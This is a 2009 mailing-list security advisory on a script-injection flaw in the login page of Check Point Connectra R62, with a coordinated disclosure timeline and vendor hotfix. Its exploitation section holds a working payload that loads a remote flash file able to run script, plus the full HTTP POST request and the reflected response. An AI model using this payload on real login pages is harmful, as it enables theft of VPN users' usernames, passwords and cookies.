[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5F9D803B30A8E4418166E637D50E9E2A4F3BA5@miraculix.scip.ch>
Date: Mon, 21 Sep 2009 17:05:31 +0200
From: "Stefan Friedli" <stfr@...p.ch>
To: <full-disclosure@...ts.grok.org.uk>, <bugtraq@...urityfocus.com>
Cc: <news@...uriteam.com>, <vuln@...unia.com>
Subject: [scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020
I. INTRODUCTION
Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.
More information is available on the official product web site at the
following URL[1]:
http://www.checkpoint.com/products/connectra/index.html
II. DESCRIPTION
Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.
The initial logon script at /Login/Login, that is being used for
unauthenticated users to log in, fails to perform proper input
validation on the data that is being submitted via HTTP POST. While
certain fields are escaped before being sent back to users browser, the
parameter "vpid_prefix" lacks any validation and is therefore vulnerable
to script injection.
Other parts of the application might be affected too.
This vulnerability has been tested on version R62, other versions might
be affected as well.
III. EXPLOITATION
Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using easy exploiting strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not
being detected by the filter in place, allowing you execute any
arbitrary, externally hosted payload.
We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.
Vulnerable Variable Value:
vpid_prefix = "><embed/src="http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=always><a name="
--- CUT ---
POST https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153
loginType=Standard&userName=&vpid_prefix="><embed/src="http://www.scip.c
h/p/s/w/ccs.swf"
allowScriptAccess=always><a name="
&password=&HeightData=1147&Login=Sign+In
--- CUT END ---
Response Snippet:
--- CUT ---
<input type="hidden" id="vpid_prefix" name="vpid_prefix"
value=""><embed/src="http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=always><a name="">
--- CUT END ---
IV. IMPACT
Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attacks.
Due to the fact that the application will often be allowed to make use
of ActiveX, it can also be used as a springboard to inject other
payloads, for example MS09-037[3] or any other vulnerability disclosed
lately, that might be exploited using a web browser.
Because other parts of the application might be affected too - this
could include some second order vulnerabilities - a severe attack
scenario might be possible.
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like <script> and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.
VI. SOLUTION
Check Point provides a hotfix for the vulnerability which should be
installed on vulnerable systems
VII. VENDOR RESPONSE
Check Point acknowledged the problem and provides a hotfix for the
vulnerability.
Detailed information on the issue, maintained by Check Point, can be
found at:
https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=sk4
2793
VIII. SOURCES
scip AG - Security Consulting Information Process (german)
http://www.scip.ch/
scip AG Vulnerability Database (german)
http://www.scip.ch/?vuldb.4020
IX. DISCLOSURE TIMELINE
2009/09/04 Identification of the vulnerability, Vendor is being
notified.
2009/09/04 Check Point confirms the receipt of the notification
2009/09/04 scip AG confirms status and procedure
2009/09/06 Check Point confirms the existence of the flaw, agrees on the
proposed timeline for coordinated release and announces a hotfix
2009/09/06 scip AG confirms status and procedure
2009/09/16 Check Point states that the hotfix is currently in QA and
will be ready for coordinated release within the next week
2009/09/21 Check Point is ready to release the hotfix and a public
vendor response
2009/09/21 scip AG confirms and coordinates public release of
advisory/vendor response/hotfix
X. CREDITS
The vulnerabilities were discovered by Stefan Friedli.
Stefan Friedli, scip AG, Zuerich, Switzerland
stfr-at-scip.ch
http://www.scip.ch/
A1. BIBLIOGRAPHY
[1] Connectra Official Vendor Information, Check Point
http://www.checkpoint.com/products/connectra/index.html
[2] XSS Cheat Sheet, RSnake
http://ha.ckers.org/xss.html
[3] Microsoft Security Bulletin MS09-037 - Critical, Microsoft
http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx
[4] Check Point Vendor-Response on this issue
https://supportcenter.checkpoint.com/supportcenter/LoginRedirect.jsp?toU
RL=eventSubmit_doGoviewsolutiondetails=%26solutionid=sk42793
A2. LEGAL NOTICES
Copyright (c) 2002-2009 scip AG, Switzerland.
Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.
Powered by blists - more mailing lists